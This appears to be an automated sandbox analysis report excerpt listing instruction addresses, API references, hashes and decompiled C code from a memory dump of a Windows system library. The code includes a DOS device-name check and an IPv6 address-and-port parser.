0x00000000
0x00000000
0x6ab65c85
0x6abc1320
0x6ab65ca7
0x6ab65cb1
0x6ab65cda
0x6ab65ce7
0x00000000
0x00000000
0x6ab65ced
0x6ab65cf1
0x6ab65d4b
0x6ab65d4f
0x6ab65d68
0x6ab65d6d
0x6ab65d80
0x6ab65d80
0x6ab65d85
0x6abc163d
0x6abc1643
0x6abc164a
0x6abc1654
0x6abc165b
0x00000000
0x00000000
0x6abc1661
0x6abc1661
0x6ab65d8b
0x6ab65d8e
0x6ab65d90
0x6ab65d93
0x6ab65d98
0x00000000
0x00000000
0x6ab65d9e
0x6ab65d9e
0x6ab65da3
0x00000000
0x6ab65dc3
0x6ab65dca
0x6ab65dcc
0x00000000
0x6ab65dcc
0x6ab65da3
0x6ab65d72
0x00000000
0x00000000
0x6ab65d77
0x6ab65d7a
0x6ab65d7d
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab65cf3
0x6ab65cf3
0x6ab65cf7
0x6ab65d1e
0x6ab65d1e
0x6ab65d24
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab65d24
0x6ab65cfd
0x6abc1630
0x00000000
0x00000000
0x6abc1636
0x6ab65d03
0x6ab65d08
0x6ab65d0c
0x00000000
0x00000000
0x6ab65d14
0x6ab65d18
0x00000000
0x00000000
0x00000000
0x6ab65d38
0x6ab65d38
0x6ab65d3b
0x6ab65d3e
0x6ab65d41
0x6ab65d44
0x6ab65d48
0x6ab65d48
0x00000000
0x6ab65d48
0x6ab65cb7
0x6ab65cbc
0x6ab65cbe
0x6ab65cbe
0x6ab65cc7
0x6ab65ccc
0x6ab65ccf
0x6ab65cd4
0x6abc132a
0x6abc132d
0x6abc1330
0x6abc1333
0x6abc1338
0x6abc1349
0x6abc1349
0x6abc134b
0x6abc1350
0x00000000
0x00000000
0x6abc1358
0x6abc1405
0x6abc1366
0x6abc1368
0x6abc136c
0x6abc136e
0x6abc1373
0x6abc1407
0x6abc1409
0x6abc1414
0x6abc140b
0x6abc140b
0x6abc140b
0x6abc1416
0x6abc1418
0x6abc141f
0x6abc1422
0x6abc1425
0x6abc1428
0x6abc1431
0x00000000
0x6abc1437
0x6abc1437
0x6abc1439
0x6abc143c
0x6abc1442
0x6abc1445
0x6abc144c
0x6abc144f
0x6abc1452
0x6abc145d
0x6abc1462
0x6abc1466
0x6abc146a
0x00000000
0x00000000
0x6abc1477
0x6abc147d
0x00000000
0x00000000
0x6abc1483
0x6abc148c
0x6abc148e
0x6abc1491
0x6abc1496
0x6abc14a2
0x6abc14a9
0x6abc14a4
0x6abc14a6
0x6abc14a6
0x6abc1498
0x6abc149a
0x6abc149a
0x6abc14ae
0x6abc14e8
0x6abc1501
0x6abc1509
0x6abc150c
0x6abc150f
0x6abc1511
0x6abc1513
0x6abc1518
0x6abc151d
0x00000000
0x00000000
0x6abc1523
0x6abc152a
0x6abc152f
0x6abc1556
0x6abc1595
0x6abc1598
0x6abc159b
0x6abc15a0
0x6abc15c8
0x00000000
0x6abc15d6
0x6abc15e3
0x6abc15ef
0x6abc15f5
0x6abc1607
0x6abc160c
0x6abc160f
0x00000000
0x6abc160f
0x6abc15c8
0x6abc15a5
0x00000000
0x6abc15b3
0x6abc15b9
0x00000000
0x6abc15b9
0x6abc15a5
0x6abc1558
0x6abc155b
0x6abc155e
0x6abc1563
0x00000000
0x00000000
0x6abc1565
0x6abc1577
0x6abc1579
0x6abc1579
0x6abc157f
0x6abc1582
0x6abc1583
0x6abc1586
0x6abc158b
0x00000000
0x6abc158d
0x6abc158d
0x00000000
0x6abc158d
0x6abc158b
0x6abc1565
0x00000000
0x6abc14b0
0x6abc14b2
0x6abc14b3
0x6abc14ba
0x6abc14bd
0x6abc14c2
0x00000000
0x00000000
0x6abc14c8
0x6abc14cf
0x6abc14d3
0x6abc14d6
0x00000000
0x6abc14d6
0x6abc14ae
0x00000000
0x6abc1612
0x6abc1612
0x6abc1615
0x6abc1616
0x6abc1619
0x00000000
0x6abc1621
0x6abc1431
0x6abc1379
0x6abc137e
0x6abc1383
0x6abc13b8
0x6abc13b8
0x6abc13be
0x00000000
0x6abc13ce
0x6abc13d0
0x6abc13e3
0x6abc13e3
0x6abc13e5
0x6abc13e5
0x6abc13e8
0x6abc13eb
0x6abc13ee
0x6abc13f3
0x00000000
0x00000000
0x00000000
0x6abc13f3
0x6abc13d2
0x6abc13d9
0x00000000
0x00000000
0x6abc13db
0x6abc13de
0x00000000
0x6abc13de
0x6abc13be
0x6abc1388
0x6abc139a
0x6abc139f
0x6abc13a3
0x00000000
0x00000000
0x6abc13ab
0x6abc13af
0x00000000
0x00000000
0x6abc13b5
0x00000000
0x00000000
0x00000000
0x00000000
0x6abc1388
0x6abc13f7
0x00000000
0x00000000
0x6abc13fd
0x6abc1400
0x6abc1400
0x00000000
0x6abc1358
0x6abc133c
0x6abc133d
0x6abc1342
0x6abc1347
0x00000000
0x00000000
0x00000000
0x6abc1347
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab65cd4
0x6ab65c8f
0x6abc12fc
0x6abc1300
0x00000000
0x00000000
0x6abc1309
0x00000000
0x00000000
0x6abc1313
0x00000000
0x00000000
0x6abc1319
0x6ab65c95
0x6ab65c97
0x6ab65ca1
0x00000000
0x00000000
0x00000000
0x6ab65ca1
0x6abc1669
0x6abc166e
0x00000000
0x6abc167c
0x00000000
0x6abc167c

APIs

_wcsnicmp.1105(?,xl--,00000004,?,?,?,?), ref: 6AB65CC7

Strings

H, xrefs: 6ABC1428
$, xrefs: 6ABC14C8
xn--, xrefs: 6AB65CBE, 6AB65CC5
$, xrefs: 6ABC14CF
xl--, xrefs: 6AB65CB7

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: _wcsnicmp
String ID: $$$$H$xl--$xn--
API String ID: 1886669725-662589111
Opcode ID: ab1185b767f4bedf57189f91ea40422b49fc465163f48f471e2c86b4dbb094c9
Instruction ID: c66ff3b4a08a1742d59cb829a813259103e2b30d5f665c61b0472e0a68b8bf88
Opcode Fuzzy Hash: ab1185b767f4bedf57189f91ea40422b49fc465163f48f471e2c86b4dbb094c9
Instruction Fuzzy Hash: A8F127B1E01289ABDF14CF68D488B9DB7B1EF44314F258369D912EB2C1EF308961DB55

Uniqueness

Uniqueness Score: -1.00%

Function 6AB874C0, Relevance: 10.8, APIs: 7, Instructions: 264
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E6AB874C0(signed short* __ecx) {
				char _v8;
				signed int _v12;
				signed int* _v16;
				void* _v20;
				signed short _t49;
				signed int _t54;
				signed int _t56;
				signed int _t57;
				signed int _t68;
				signed short* _t71;
				signed int _t74;
				signed int _t80;
				signed int _t85;
				signed int _t86;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				char _t91;
				signed short* _t92;
				unsigned short _t93;
				char _t94;
				signed short* _t95;
				signed int _t100;
				unsigned short _t101;
				signed short* _t104;
				signed int _t105;
				void* _t106;
				signed int* _t107;
				signed short _t108;
				signed int _t109;
				signed int _t112;
				signed int* _t113;

				_t92 = __ecx;
				_t104 = __ecx[2];
				_t112 =  *__ecx & 0x0000ffff;
				_v8 = 0;
				if(_t112 < 2) {
					L3:
					_t49 =  *_t92;
					_t113 = _t104;
					_t108 = _t49;
					_v20 = _t49;
					_t89 = _t108 & 0x0000ffff;
					_t93 = _t89;
					_v16 = _t113;
					_t105 = _t93 >> 0x00000001 & 0x0000ffff;
					if(_t105 == 0) {
						goto L28;
					} else {
						if( *((short*)(_t113 + _t105 * 2 - 2)) == 0x3a) {
							_t43 = _t93 - 2; // 0xfffffe
							_t108 = _t43;
							_t105 = _t105 + 0xffff;
							_t94 = 1;
							_v8 = 1;
						} else {
							_t94 = 0;
						}
						if(_t105 == 0) {
							goto L28;
						} else {
							while(1) {
								_t54 =  *(_t113 + (_t105 & 0x0000ffff) * 2 - 2) & 0x0000ffff;
								if(_t54 != 0x2e && _t54 != 0x20) {
									break;
								}
								_v12 = 0xfffe;
								_t105 = _t105 + 0xffff;
								_t108 = _t108 + _v12;
								_t94 = _t94 + 1;
								if(_t105 != 0) {
									continue;
								} else {
								}
								break;
							}
							_v8 = _t94;
							_v12 = 0;
							if(_t105 == 0) {
								L20:
								_t95 = _t113;
								_t106 = _t113 + (_t105 & 0x0000ffff) * 2;
								if(_t113 < _t106) {
									while(1) {
										_t68 =  *_t95 & 0x0000ffff;
										if(_t68 == 0x2e || _t68 == 0x3a) {
											break;
										}
										_t95 =  &(_t95[1]);
										if(_t95 < _t106) {
											continue;
										}
										break;
									}
									if(_t95 > _t113) {
										while( *((short*)(_t95 - 2)) == 0x20) {
											_t95 =  &(_t95[0xffffffffffffffff]);
											if(_t95 > _t113) {
												continue;
											} else {
											}
											goto L27;
										}
									}
								}
								L27:
								_t56 = _t95 - _t113 >> 0x00000001 & 0x0000ffff;
								_t109 = _t56;
								_v20 = _t56 + _t56;
								if(_t109 != 5) {
									_t26 = _t109 - 3; // 0x37
									_t57 = _t26;
									if(_t57 > 4) {
										goto L28;
									} else {
										switch( *((intOrPtr*)(_t57 * 4 +  &M6AB877C8))) {
											case 0:
												if(RtlEqualUnicodeString( &_v20, 0x6ab41040, 1) != 0 || RtlEqualUnicodeString( &_v20, 0x6ab41050, 1) != 0 || RtlEqualUnicodeString( &_v20, 0x6ab41048, 1) != 0) {
													goto L46;
												} else {
													_push(1);
													_push(0x6ab41058);
													goto L45;
												}
												goto L76;
											case 1:
												_t36 = __esi + 6; // 0xe6ab4
												__eax =  *_t36 & 0x0000ffff;
												if(iswdigit( *_t36 & 0x0000ffff) == 0) {
													goto L28;
												} else {
													if( *(__esi + 6) == 0x30) {
														goto L28;
													} else {
														_t46 = __ebx - 2; // -1
														__eax = _t46;
														_v20 = __ax;
														 &_v20 = RtlEqualUnicodeString( &_v20, 0x6ab418f8, 1);
														if(__al != 0) {
															goto L46;
														} else {
															_push(1);
															_push(0x6ab41910);
															goto L45;
														}
													}
												}
												goto L76;
											case 2:
												goto L28;
											case 3:
												_push(1);
												_push(0x6ab41068);
												L45:
												if(RtlEqualUnicodeString( &_v20, ??, ??) == 0) {
													goto L28;
												} else {
													goto L46;
												}
												goto L76;
											case 4:
												_t35 =  &_v20; // 0xffff0
												_t35 = RtlEqualUnicodeString(_t35, 0x6ab41060, 1);
												if(__al == 0) {
													goto L28;
												} else {
													L46:
													return _t109 + _t109 | _v12 << 0x00000010;
												}
												goto L76;
										}
									}
								} else {
									goto L28;
								}
							} else {
								_t71 = _t113 + ((_t105 & 0x0000ffff) - 1) * 2;
								if(_t71 < _t113) {
									L19:
									_t74 = ( *_t113 | 0x00000020) & 0x0000ffff;
									if(_t74 != 0x70) {
										if(_t74 == 0x6c || _t74 == 0x6e || _t74 == 0x61 || _t74 == 0x63) {
											goto L20;
										} else {
											goto L28;
										}
									} else {
										goto L20;
									}
								} else {
									while(1) {
										_t100 =  *_t71 & 0x0000ffff;
										if(_t100 == 0x5c || _t100 == 0x2f) {
											break;
										}
										if(_t100 == 0x3a) {
											if(_t71 !=  &(_t113[0])) {
												goto L14;
											} else {
												break;
											}
										} else {
											L14:
											_t71 = _t71 - 2;
											if(_t71 >= _t113) {
												continue;
											} else {
												goto L19;
											}
										}
										goto L76;
									}
									_t15 =  &(_t71[1]); // 0x3b
									_t107 = _t15;
									if(_t107 >= _t113 + (_t89 & 0xfffffffe)) {
										goto L28;
									} else {
										_t80 = ( *_t107 | 0x00000020) & 0x0000ffff;
										if(_t80 != 0x70) {
											if(_t80 == 0x6c || _t80 == 0x6e || _t80 == 0x61) {
												goto L18;
											} else {
												if(_t80 != 0x63) {
													goto L28;
												} else {
													goto L18;
												}
											}
										} else {
											L18:
											_v12 = _t107 - _t113;
											_t91 = _v8;
											_t101 = _t113 - _t107 + _t89 & 0x0000ffff;
											_t113 = _t107;
											_v16 = _t113;
											_t105 = (_t101 >> 0x00000001) - _t91 & 0x0000ffff;
											_v20 = _t101 - _t91 + _t91;
											goto L19;
										}
									}
								}
							}
						}
					}
				} else {
					_t85 =  *_t104 & 0x0000ffff;
					if(_t85 == 0x5c || _t85 == 0x2f) {
						if(_t112 < 4) {
							goto L3;
						} else {
							_t86 = _t104[1] & 0x0000ffff;
							if(_t86 != 0x5c) {
								if(_t86 != 0x2f) {
									goto L3;
								} else {
									goto L54;
								}
							} else {
								L54:
								if(_t112 < 6) {
									L28:
									return 0;
								} else {
									_t87 = _t104[2] & 0x0000ffff;
									if(_t87 != 0x2e) {
										if(_t87 == 0x3f) {
											goto L56;
										} else {
											goto L28;
										}
									} else {
										L56:
										if(_t112 < 8) {
											L69:
											if(_t112 != 6) {
												goto L28;
											} else {
												goto L3;
											}
										} else {
											_t88 = _t104[3] & 0x0000ffff;
											if(_t88 == 0x5c) {
												goto L28;
											} else {
												if(_t88 == 0x2f) {
													goto L28;
												} else {
													goto L69;
												}
											}
										}
									}
								}
							}
						}
					} else {
						goto L3;
					}
				}
				L76:
			}

0x6ab874c0
0x6ab874c8
0x6ab874cd
0x6ab874d0
0x6ab874db
0x6ab874f2
0x6ab874f2
0x6ab874f4
0x6ab874f6
0x6ab874f9
0x6ab874fc
0x6ab874ff
0x6ab87501
0x6ab8750a
0x6ab87510
0x00000000
0x6ab87516
0x6ab8751c
0x6ab877af
0x6ab877af
0x6ab877b2
0x6ab877b8
0x6ab877bd
0x6ab87522
0x6ab87522
0x6ab87522
0x6ab87527
0x00000000
0x6ab8752d
0x6ab8752d
0x6ab87530
0x6ab87539
0x00000000
0x00000000
0x6ab8778f
0x6ab87796
0x6ab8779c
0x6ab877a0
0x6ab877a4
0x00000000
0x00000000
0x6ab877aa
0x00000000
0x6ab877a4
0x6ab87549
0x6ab8754c
0x6ab87556
0x6ab875e5
0x6ab875e8
0x6ab875ea
0x6ab875ef
0x6ab875f1
0x6ab875f1
0x6ab875f7
0x00000000
0x00000000
0x6ab875fe
0x6ab87603
0x00000000
0x00000000
0x00000000
0x6ab87603
0x6ab87607
0x6ab87610
0x6abcf983
0x6abcf988
0x00000000
0x00000000
0x6abcf98e
0x00000000
0x6abcf988
0x6ab87610
0x6ab87607
0x6ab8761b
0x6ab8761f
0x6ab87622
0x6ab87627
0x6ab8762e
0x6ab87680
0x6ab87680
0x6ab87686
0x00000000
0x6ab87688
0x6ab87688
0x00000000
0x6ab876a1
0x00000000
0x6ab876cb
0x6ab876cb
0x6ab876cd
0x00000000
0x6ab876cd
0x00000000
0x00000000
0x6ab87718
0x6ab87718
0x6ab87727
0x00000000
0x6ab8772d
0x6abcf998
0x00000000
0x6abcf99e
0x6abcf99e
0x6abcf99e
0x6abcf9a3
0x6abcf9b0
0x6abcf9b7
0x00000000
0x6abcf9bd
0x6abcf9bd
0x6abcf9bf
0x00000000
0x6abcf9bf
0x6abcf9b7
0x6abcf998
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab8770f
0x6ab87711
0x6ab876d2
0x6ab876dd
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6ab876fc
0x6ab87700
0x6ab87707
0x00000000
0x6ab8770d
0x6ab876e3
0x6ab876f4
0x6ab876f4
0x00000000
0x00000000
0x6ab87688
0x00000000
0x00000000
0x00000000
0x6ab8755c
0x6ab87560
0x6ab87565
0x6ab875d6
0x6ab875dd
0x6ab875e3
0x6ab87661
0x00000000
0x6ab8767e
0x00000000
0x6ab8767e
0x00000000
0x00000000
0x00000000
0x6ab87567
0x6ab87567
0x6ab87567
0x6ab8756d
0x00000000
0x00000000
0x6ab87577
0x6ab8777a
0x00000000
0x6ab87780
0x00000000
0x6ab87780
0x6ab8757d
0x6ab8757d
0x6ab8757d
0x6ab87582
0x00000000
0x6ab87584
0x00000000
0x6ab87584
0x6ab87582
0x00000000
0x6ab87577
0x6ab87586
0x6ab87586
0x6ab87592
0x00000000
0x6ab87598
0x6ab8759f
0x6ab875a5
0x6ab8763c
0x00000000
0x6ab87654
0x6ab87657
0x00000000
0x6ab87659
0x00000000
0x6ab87659
0x6ab87657
0x6ab875ab
0x6ab875ab
0x6ab875b3
0x6ab875b6
0x6ab875b9
0x6ab875bc
0x6ab875c1
0x6ab875ca
0x6ab875d2
0x00000000
0x6ab875d2
0x6ab875a5
0x6ab87592
0x6ab87565
0x6ab87556
0x6ab87527
0x6ab874dd
0x6ab874dd
0x6ab874e3
0x6ab87735
0x00000000
0x6ab8773b
0x6ab8773b
0x6ab87742
0x6abcf961
0x00000000
0x6abcf967
0x00000000
0x6abcf967
0x6ab87748
0x6ab87748
0x6ab8774b
0x6ab87630
0x6ab87638
0x6ab87751
0x6ab87751
0x6ab87758
0x6ab87788
0x00000000
0x6ab8778a
0x00000000
0x6ab8778a
0x6ab8775a
0x6ab8775a
0x6ab8775d
0x6abcf975
0x6abcf978
0x00000000
0x6abcf97e
0x00000000
0x6abcf97e
0x6ab87763
0x6ab87763
0x6ab8776a
0x00000000
0x6ab87770
0x6abcf96f
0x00000000
0x00000000
0x00000000
0x00000000
0x6abcf96f
0x6ab8776a
0x6ab8775d
0x6ab87758
0x6ab8774b
0x6ab87742
0x00000000
0x00000000
0x00000000
0x6ab874e3
0x00000000

APIs

RtlEqualUnicodeString.1105(?,6AB41040,00000001,?,00000024,01000000), ref: 6AB8769A
RtlEqualUnicodeString.1105(?,6AB41050,00000001,?,6AB41040,00000001,?,00000024,01000000), ref: 6AB876AE
RtlEqualUnicodeString.1105(?,6AB41048,00000001,?,6AB41050,00000001,?,6AB41040,00000001,?,00000024,01000000), ref: 6AB876C2
RtlEqualUnicodeString.1105(?,6AB41058,00000001,?,6AB41048,00000001,?,6AB41050,00000001,?,6AB41040,00000001,?,00000024,01000000), ref: 6AB876D6
RtlEqualUnicodeString.1105(000FFFF0,6AB41060,00000001,6AB41068,00000001,6AB418F8,00000001), ref: 6AB87700
iswdigit.1105(000E6AB4,6AB41048,00000001,?,6AB41050,00000001,?,6AB41040,00000001,?,00000024,01000000), ref: 6AB8771D
RtlEqualUnicodeString.1105(00100000,6AB418F8,00000001), ref: 6ABCF9B0

Memory Dump Source

Source File: 00000014.00000002.876450238.000000006AB41000.00000020.00020000.sdmp, Offset: 6AB40000, based on PE: true

Associated: 00000014.00000002.876363411.000000006AB40000.00000002.00020000.sdmp Download File
Associated: 00000014.00000002.879411546.000000006AC55000.00000008.00020000.sdmp Download File
Associated: 00000014.00000002.879445786.000000006AC5B000.00000004.00020000.sdmp Download File
Associated: 00000014.00000002.879498779.000000006AC5F000.00000002.00020000.sdmp Download File

Similarity

API ID: EqualStringUnicode$iswdigit
String ID:
API String ID: 3246613909-0
Opcode ID: 8d7853e82f18c5c8065b6704964a5b31e13a76434b712756c9636901b11c537c
Instruction ID: a005b85ccff87a9543c2b99f5132fea8f242566cc053051a14c657db6bfcdc1d
Opcode Fuzzy Hash: 8d7853e82f18c5c8065b6704964a5b31e13a76434b712756c9636901b11c537c
Instruction Fuzzy Hash: E58121F5F142E196CB20CA9C84806FDB3A2EF0630CF520926E4A5DB191EFF185C5F291

Uniqueness

Uniqueness Score: -1.00%

Function 6AB60B60, Relevance: 10.7, APIs: 7, Instructions: 234
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E6AB60B60(signed short* _a4, intOrPtr _a8, intOrPtr* _a12, short* _a16) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _t39;
				signed int _t41;
				void* _t45;
				void* _t50;
				long _t51;
				signed int _t52;
				signed int _t53;
				signed int _t60;
				signed int _t64;
				signed int _t75;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				signed int _t87;
				signed short* _t90;
				void* _t93;
				signed int _t105;
				signed short* _t106;
				signed int _t111;
				void* _t115;
				signed int _t116;
				signed int _t117;
				signed int _t121;
				signed int _t122;
				long _t123;
				long _t125;
				void* _t128;
				signed short* _t131;

				_t90 = _a4;
				if(_t90 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
					L6:
					_t39 = 0xc000000d;
				} else {
					_t87 = 0;
					_v16 = 0;
					_t41 =  *_t90 & 0x0000ffff;
					_t115 = 0x5b;
					_t121 = _t41;
					_v20 = _t121;
					if(_t41 == _t115) {
						_t90 =  &(_t90[1]);
					}
					_v5 = _t121 == _t115;
					if(E6AB60BD0(_t90,  &_v24, _a8) >= 0) {
						_t131 = _v24;
						_v12 = 0xa;
						__eflags =  *_t131 - 0x25;
						if( *_t131 != 0x25) {
							L22:
							_t45 = 0x5d;
							goto L23;
						} else {
							_t131 =  &(_t131[1]);
							_t125 =  *_t131 & 0x0000ffff;
							__eflags = _t125 - 0x80;
							if(_t125 >= 0x80) {
								goto L6;
							} else {
								_t76 = iswctype(_t125, 4);
								__eflags = _t76;
								if(_t76 == 0) {
									goto L6;
								} else {
									while(1) {
										__eflags = _t125;
										if(_t125 == 0) {
											break;
										}
										_t45 = 0x5d;
										__eflags = _t125 - _t45;
										if(_t125 == _t45) {
											_t121 = _v20;
											L23:
											__eflags =  *_t131 - _t45;
											if( *_t131 != _t45) {
												L45:
												_t116 = _v5;
												goto L46;
											} else {
												_t50 = 0x5b;
												__eflags = _t121 - _t50;
												if(_t121 != _t50) {
													goto L6;
												} else {
													_t131 =  &(_t131[1]);
													_t116 = 0;
													_v5 = 0;
													__eflags =  *_t131 - 0x3a;
													if( *_t131 != 0x3a) {
														L46:
														__eflags =  *_t131;
														if( *_t131 != 0) {
															goto L6;
														} else {
															__eflags = _t116;
															if(_t116 != 0) {
																goto L6;
															} else {
																 *_a16 = _t87;
																 *_a12 = _v16;
																_t39 = 0;
															}
														}
													} else {
														_t131 =  &(_t131[1]);
														_t122 = 0x10;
														__eflags =  *_t131 - 0x30;
														if( *_t131 != 0x30) {
															_t117 = 0xa;
														} else {
															_t24 =  &(_t131[1]); // -4
															_t106 = _t24;
															_t131 = _t106;
															_t117 = 8;
															_v12 = _t117;
															_t75 =  *_t131 & 0x0000ffff;
															__eflags = _t75 - 0x78;
															if(_t75 == 0x78) {
																L29:
																_t117 = _t122;
																_t26 =  &(_t106[1]); // 0x0
																_t131 = _t26;
																_v12 = _t117;
															} else {
																__eflags = _t75 - 0x58;
																if(_t75 != 0x58) {
																	goto L32;
																} else {
																	goto L29;
																}
																while(1) {
																	L32:
																	_t123 =  *_t131 & 0x0000ffff;
																	__eflags = _t123;
																	if(_t123 == 0) {
																		goto L45;
																	}
																	_t51 = 0x80;
																	__eflags = _t123 - 0x80;
																	if(_t123 >= 0x80) {
																		L39:
																		_t93 = 0x10;
																		__eflags = _t117 - _t93;
																		if(_t117 != _t93) {
																			goto L6;
																		} else {
																			__eflags = _t123 - _t51;
																			if(_t123 >= _t51) {
																				goto L6;
																			} else {
																				_t52 = iswctype(_t123, _t51);
																				__eflags = _t52;
																				if(_t52 == 0) {
																					goto L6;
																				} else {
																					_t53 = iswctype(_t123, 2);
																					asm("sbb eax, eax");
																					__eflags = (_t123 & 0x0000ffff) + 0xa + ((_t87 & 0x0000ffff) << 4) - ( ~_t53 & 0x00000020) + 0x41 - 0xffff;
																					if((_t123 & 0x0000ffff) + 0xa + ((_t87 & 0x0000ffff) << 4) - ( ~_t53 & 0x00000020) + 0x41 > 0xffff) {
																						goto L6;
																					} else {
																						_t60 = iswctype(_t123, 2);
																						_t117 = _v12;
																						asm("sbb eax, eax");
																						_t87 = (_t87 << 4) + 0xa + _t123 - ( ~_t60 & 0x00000020) + 0x41;
																						__eflags = _t87;
																						goto L44;
																					}
																				}
																			}
																		}
																	} else {
																		_t64 = iswctype(_t123, 4);
																		_t117 = _v12;
																		__eflags = _t64;
																		if(_t64 == 0) {
																			L38:
																			_t51 = 0x80;
																			goto L39;
																		} else {
																			_t105 = _t123 & 0x0000ffff;
																			_v24 = _t117 & 0x0000ffff;
																			_t31 = _t105 - 0x30; // -44
																			__eflags = _t31 - _v24;
																			if(_t31 >= _v24) {
																				goto L38;
																			} else {
																				__eflags = (_t87 & 0x0000ffff) * _v24 + 0xffffffd0 + _t105 - 0xffff;
																				if((_t87 & 0x0000ffff) * _v24 + 0xffffffd0 + _t105 > 0xffff) {
																					goto L6;
																				} else {
																					_t87 = _t117 * _t87 + 0xffffffd0 + _t123 & 0x0000ffff;
																					L44:
																					_t131 =  &(_t131[1]);
																					continue;
																				}
																			}
																		}
																	}
																	goto L7;
																}
																goto L45;
															}
														}
														goto L32;
													}
												}
											}
										} else {
											__eflags = _t125 - _t45 + 0x23;
											if(_t125 >= _t45 + 0x23) {
												goto L6;
											} else {
												_t78 = iswctype(_t125, 4);
												__eflags = _t78;
												if(_t78 == 0) {
													goto L6;
												} else {
													_v24 = _t125 & 0x0000ffff;
													_t80 = _v16;
													_t111 = 0xa;
													asm("cdq");
													asm("adc ecx, edx");
													_t128 = _t80 * _t111 + _v24 + 0xffffffd0;
													asm("adc ecx, 0xffffffff");
													__eflags = _t80 * _t111 >> 0x20;
													if(__eflags > 0) {
														goto L6;
													} else {
														if(__eflags < 0) {
															L19:
															_t131 =  &(_t131[1]);
															__eflags = _t131;
															_v16 = _v16 * 0xa + _v24 + 0xffffffd0;
															_t125 =  *_t131 & 0x0000ffff;
															continue;
														} else {
															__eflags = _t128 - 0xffffffff;
															if(_t128 > 0xffffffff) {
																goto L6;
															} else {
																goto L19;
															}
														}
													}
												}
											}
										}
										goto L7;
									}
									_t121 = _v20;
									goto L22;
								}
							}
						}
					} else {
						goto L6;
					}
				}
				L7:
				return _t39;
			}

0x6ab60b65
0x6ab60b70
0x6ab60bb7
0x6ab60bb7
0x6ab60b84
0x6ab60b86
0x6ab60b88
0x6ab60b8b
0x6ab60b90
0x6ab60b91
0x6ab60b93
0x6ab60b99
0x6ab60bc5
0x6ab60bc5
0x6ab60ba6
0x6ab60bb1
0x6abbe578
0x6abbe580
0x6abbe587
0x6abbe58b
0x6abbe62e
0x6abbe630
0x00000000
0x6abbe591
0x6abbe591
0x6abbe594
0x6abbe597
0x6abbe59a
0x00000000
0x6abbe5a0
0x6abbe5a3
0x6abbe5aa
0x6abbe5ac
0x00000000
0x6abbe5b2
0x6abbe626
0x6abbe626
0x6abbe629
0x00000000
0x00000000
0x6abbe5b6
0x6abbe5b7
0x6abbe5ba
0x6abbe686
0x6abbe631
0x6abbe631
0x6abbe634
0x6abbe76f
0x6abbe76f
0x00000000
0x6abbe63a
0x6abbe63c
0x6abbe63d
0x6abbe640
0x00000000
0x6abbe646
0x6abbe646
0x6abbe649
0x6abbe64b
0x6abbe64e
0x6abbe652
0x6abbe772
0x6abbe774
0x6abbe777
0x00000000
0x6abbe77d
0x6abbe77d
0x6abbe77f
0x00000000
0x6abbe785
0x6abbe78c
0x6abbe795
0x6abbe797
0x6abbe797
0x6abbe77f
0x6abbe658
0x6abbe658
0x6abbe65d
0x6abbe65e
0x6abbe662
0x6abbe68d
0x6abbe664
0x6abbe664
0x6abbe664
0x6abbe667
0x6abbe66b
0x6abbe66c
0x6abbe66f
0x6abbe672
0x6abbe675
0x6abbe67c
0x6abbe67c
0x6abbe67e
0x6abbe67e
0x6abbe681
0x6abbe677
0x6abbe677
0x6abbe67a
0x00000000
0x00000000
0x00000000
0x00000000
0x6abbe68e
0x6abbe68e
0x6abbe68e
0x6abbe691
0x6abbe694
0x00000000
0x00000000
0x6abbe69a
0x6abbe69f
0x6abbe6a2
0x6abbe6f1
0x6abbe6f3
0x6abbe6f4
0x6abbe6f7
0x00000000
0x6abbe6fd
0x6abbe6fd
0x6abbe700
0x00000000
0x6abbe706
0x6abbe708
0x6abbe70f
0x6abbe711
0x00000000
0x6abbe717
0x6abbe71a
0x6abbe722
0x6abbe73b
0x6abbe740
0x00000000
0x6abbe746
0x6abbe74c
0x6abbe751
0x6abbe757
0x6abbe765
0x6abbe765
0x00000000
0x6abbe765
0x6abbe740
0x6abbe711
0x6abbe700
0x6abbe6a4
0x6abbe6a7
0x6abbe6ac
0x6abbe6b1
0x6abbe6b3
0x6abbe6ec
0x6abbe6ec
0x00000000
0x6abbe6b5
0x6abbe6b5
0x6abbe6bb
0x6abbe6be
0x6abbe6c1
0x6abbe6c4
0x00000000
0x6abbe6c6
0x6abbe6d2
0x6abbe6d7
0x00000000
0x6abbe6dd
0x6abbe6e7
0x6abbe767
0x6abbe767
0x00000000
0x6abbe767
0x6abbe6d7
0x6abbe6c4
0x6abbe6b3
0x00000000
0x6abbe6a2
0x00000000
0x6abbe68e
0x6abbe675
0x00000000
0x6abbe662
0x6abbe652
0x6abbe640
0x6abbe5c0
0x6abbe5c3
0x6abbe5c6
0x00000000
0x6abbe5cc
0x6abbe5cf
0x6abbe5d6
0x6abbe5d8
0x00000000
0x6abbe5de
0x6abbe5e1
0x6abbe5e4
0x6abbe5e9
0x6abbe5f3
0x6abbe5f6
0x6abbe5f8
0x6abbe5fb
0x6abbe5fe
0x6abbe600
0x00000000
0x6abbe606
0x6abbe606
0x6abbe611
0x6abbe61d
0x6abbe61d
0x6abbe620
0x6abbe623
0x00000000
0x6abbe608
0x6abbe608
0x6abbe60b
0x00000000
0x00000000
0x00000000
0x00000000
0x6abbe60b
0x6abbe606
0x6abbe600
0x6abbe5d8
0x6abbe5c6
0x00000000
0x6abbe5ba
0x6abbe62b
0x00000000
0x6abbe62b
0x6abbe5ac
0x6abbe59a
0x00000000
0x00000000
0x00000000
0x6ab60bb1
0x6ab60bbc
0x6ab60bc2

APIs

